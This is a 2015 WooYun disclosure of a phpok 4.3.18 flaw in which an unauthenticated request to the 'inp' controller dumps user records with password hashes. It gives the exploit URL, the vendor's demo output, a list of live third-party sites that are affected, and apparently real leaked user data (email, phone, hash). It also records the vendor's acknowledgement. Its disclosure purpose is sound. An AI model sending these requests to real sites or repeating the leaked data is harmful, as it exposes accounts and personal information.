当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127843

漏洞标题:phpok4.3.18 存高危设计缺陷(demo测试)。

相关厂商:phpok.com

漏洞作者: ′雨。

提交时间:2015-07-20 14:53

修复时间:2015-10-18 15:36

公开时间:2015-10-18 15:36

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-20: 厂商已经确认,细节仅向厂商公开
2015-07-23: 细节向第三方安全合作伙伴开放
2015-09-13: 细节向核心白帽子及相关领域专家公开
2015-09-23: 细节向普通白帽子公开
2015-10-03: 细节向实习白帽子公开
2015-10-18: 细节向公众公开

简要描述:

RT

详细说明:

可直接拿管理员密码。
在framework/inp_control.php 中

function index_f()
{

$type = $this->get("type");

$content = $this->get("content");
if($type == "title" && $content)
{
$this->get_title_list($content);
}
elseif($type == "user" && $content)
{
$this->get_user_list($content);//跟这里
}
json_exit("ok");
}


function get_user_list($content)
{
$content = explode(",",$content);//成数组
$list = array();
foreach($content AS $key=>$value)
{
$value = intval($value);//被转整 没办法注入了。
if($value) $list[] = $value;
}
$list = array_unique($list);
$content = implode(",",$list);
if(!$content) json_exit("ok");
$condition = "u.id IN(".$content.")";//把转整后的带入
$rslist = $this->model("user")->get_list($condition,0,999);
if($rslist)
{
json_exit($rslist,true);
}
json_exit("ok");
}


虽然没办法注入 但是我们继续看

if($rslist)//查询出来的数组
{
json_exit($rslist,true);//数出来
}
json_exit("ok");


把全部就输出来了。。 可啪。。
包括密码 全部的。
本地测试一下
访问 http://web/new/phpok/index.php?id=inp&type=user&content=3
输出 {"status":"ok","content":{"":{"id":null,"group_id":"2","user":"admin","pass":"ea6db1173951383825637cb4eea24bcd:38","status":"1","regtime":"1389672572","email":"ad@admin.com","mobile":"158185xxxxx","code":"","avatar":"res\/201402\/08\/488e6e17b9fb7f75.jpg","fullname":"","gender":"","content":false}}}
demo测试一下
http://demo.phpok.com/index.php?id=inp&type=user&content=17
http://demo.phpok.com/index.php?id=inp&type=user&content=14
http://demo.phpok.com/index.php?id=inp&type=user&content=15
{"status":"ok","content":{"15":{"id":"15","group_id":"2","user":"ehu114","pass":"0ba5a37e002bcb9f4469e5deb3ec317f:15","status":"0","regtime":"1424368658","email":"8752316@qq.com","mobile":"18961833060","code":"","avatar":"","fullname":"","gender":"","content":""}}}
都输出了密码 之类的
官网上的成功案例。
http://www.easyexe.cn/index.php?id=inp&type=user&content=2
http://www.artpower.com.cn/index.php?id=inp&type=user&content=2
http://angeljuicer.cn/index.php?id=inp&type=user&content=3
http://www.sz-drh.com//index.php?id=inp&type=user&content=3
http://www.udeesoft.com//index.php?id=inp&type=user&content=3

漏洞证明:

见上。

修复方案:

敏感信息别输出。

版权声明:转载请注明来源 ′雨。@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-20 15:35

厂商回复:

好吧,我才发现这个文件我几乎没有用到,都不记得当时写个接口是做啥子用的,没想到你还能利用起来!囧啊~~~

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-20 14:54 | 凌零0 ( 实习白帽子 | Rank:37 漏洞数:6 )

    6

  2. 2015-07-20 14:54 | Cheery ( 路人 | Rank:8 漏洞数:2 | 0.0)

    前排

  3. 2015-07-20 15:01 | sin ( 实习白帽子 | Rank:38 漏洞数:2 | 寻找最优雅的解决方案)

    又来...

  4. 2015-07-20 15:03 | myhalo ( 普通白帽子 | Rank:281 漏洞数:55 | 所属团队:TSafe)

    回来了?

  5. 2015-07-20 15:26 | Hero ( 普通白帽子 | Rank:116 漏洞数:31 | 药药切克闹,充气娃娃迷幻药)

    雨牛复活了

  6. 2015-07-20 17:31 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    可shell?